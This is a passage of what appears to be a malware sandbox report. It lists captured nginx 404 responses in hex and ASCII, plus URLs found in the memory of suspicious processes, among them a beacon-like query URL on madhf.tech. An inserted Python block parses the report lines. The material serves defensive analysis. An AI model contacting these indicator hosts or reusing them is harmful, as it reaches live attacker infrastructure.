                 Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 02:27:21 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                 Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 02:27:23 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                 Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 02:27:26 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
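Only the server side of each exchange is listed here, so the decoded error page is the one place the answering host names itself: the Apache body carries an `<address>` line for www.yc791022.asia, while the nginx bodies (one variant with an ETag and trailing spaces, one padded with the MSIE/Chrome comments) name nothing. The block below is an added example and not part of the report: it splits the run-together header fields of the text rendering (it also accepts the pipe-delimited rendering), decodes Data Raw, checks the byte count against Content-Length and the decoded text against the Data Ascii view, and extracts the origin host and port from the Apache page. The two sample lines are copied from this report; HEADER_NAMES is an assumption that covers the header names occurring on this page and must be extended for other reports.

```python
"""Parse the 'HTTP traffic detected' lines of a Joe Sandbox report.

Added example, not part of the report. The two sample lines are copied from
this report (the short Apache and nginx 404 responses). HEADER_NAMES is an
assumption: it covers the header names that occur on this page.
"""
import re

HEADER_NAMES = ["Date", "Server", "Content-Length", "Connection",
                "Content-Type", "ETag", "Data Raw", "Data Ascii"]
# Zero-width split in front of every known "Name: " so fused headers come apart.
_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in HEADER_NAMES))
# Apache's default error page names the virtual host that answered.
_ADDRESS = re.compile(r"<address>(?:Apache\S* Server at )?([\w.-]+) Port (\d+)</address>")

# Sample lines copied from the report: Data Raw hex and Data Ascii as rendered there.
_APACHE_HEX = (
    "3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f "
    "49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c "
    "68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 "
    "20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 "
    "79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 "
    "68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 "
    "6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c "
    "68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 "
    "20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 "
    "20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d "
    "6c 3e 0a "
)
_APACHE_ASCII = ('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head>'
                 '<title>404 Not Found</title></head><body><h1>Not Found</h1>'
                 '<p>The requested URL was not found on this server.</p><hr>'
                 '<address>Apache Server at www.yc791022.asia Port 80</address>'
                 '</body></html>')
_NGINX_HEX = (
    "0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e "
    "6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 "
    "6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 "
    "6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 "
    "6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 "
    "3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 "
)
_NGINX_ASCII = ("<html><head><title>404 Not Found</title></head><body>"
                "<center><h1>404 Not Found</h1></center><hr><center>nginx</center>"
                "</body></html>")
SAMPLE_LINES = [
    "Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 "
    "02:26:41 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; "
    "charset=iso-8859-1Data Raw: " + _APACHE_HEX + "Data Ascii: " + _APACHE_ASCII,
    "Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, "
    "11 Jan 2025 02:26:50 GMTContent-Type: text/htmlContent-Length: 148Connection: close"
    'ETag: "67811756-94"Data Raw: ' + _NGINX_HEX + "Data Ascii: " + _NGINX_ASCII,
]


def parse_http_line(line: str) -> dict:
    """Return status line, header dict, raw body bytes and the report's ASCII view."""
    text = line.strip().replace(" | ", "")          # accept fused or pipe-delimited rendering
    _, _, rest = text.partition("HTTP traffic detected: ")
    parts = _SPLIT.split(rest)
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name] = value.strip()
    body = bytes.fromhex(headers.pop("Data Raw", ""))
    return {"status": parts[0].strip(), "headers": headers,
            "body": body, "ascii": headers.pop("Data Ascii", "")}


def check_response(rec: dict) -> dict:
    """Consistency checks a responder wants before trusting the captured body."""
    declared = int(rec["headers"].get("Content-Length", "-1"))
    text = rec["body"].decode("iso-8859-1")
    # The report's ASCII view drops CR/LF, so compare on the same basis.
    printable = text.replace("\r", "").replace("\n", "").strip()
    m = _ADDRESS.search(text)
    return {"status": rec["status"],
            "server": rec["headers"].get("Server"),
            "length_ok": len(rec["body"]) == declared,
            "ascii_matches": printable == rec["ascii"].strip(),
            "origin_host": m.group(1) if m else None,
            "origin_port": int(m.group(2)) if m else None}


def triage(lines):
    return [check_response(parse_http_line(l)) for l in lines if "HTTP traffic detected" in l]


if __name__ == "__main__":
    for r in triage(SAMPLE_LINES):
        print(r)
```

A `length_ok` of False means the sandbox truncated the capture and the body cannot be used for matching; `ascii_matches` guards against transcription damage when the report has been copied around as text; `origin_host` is the value to pivot on, since the request host is not part of this section.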
                 Source: waitfor.exe, 00000007.00000002.3813572544.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710385375.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1949830012.0000000001B1C000.00000004.80000000.00040000.00000000.sdmp, suBpo1g13Q.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                 Source: waitfor.exe, 00000007.00000002.3813572544.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710385375.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1949830012.0000000001B1C000.00000004.80000000.00040000.00000000.sdmp, suBpo1g13Q.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
                 Source: waitfor.exe, 00000007.00000002.3813572544.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710385375.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1949830012.0000000001B1C000.00000004.80000000.00040000.00000000.sdmp, suBpo1g13Q.exe | String found in binary or memory: http://ocsp.comodoca.com0
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.Jcsa.info
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0i
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjPH20
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjP
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.jcsa.info/Japanese_Language_School.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iO
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.jcsa.info/display.cfm
                 Source: iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.000000000354E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBY
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
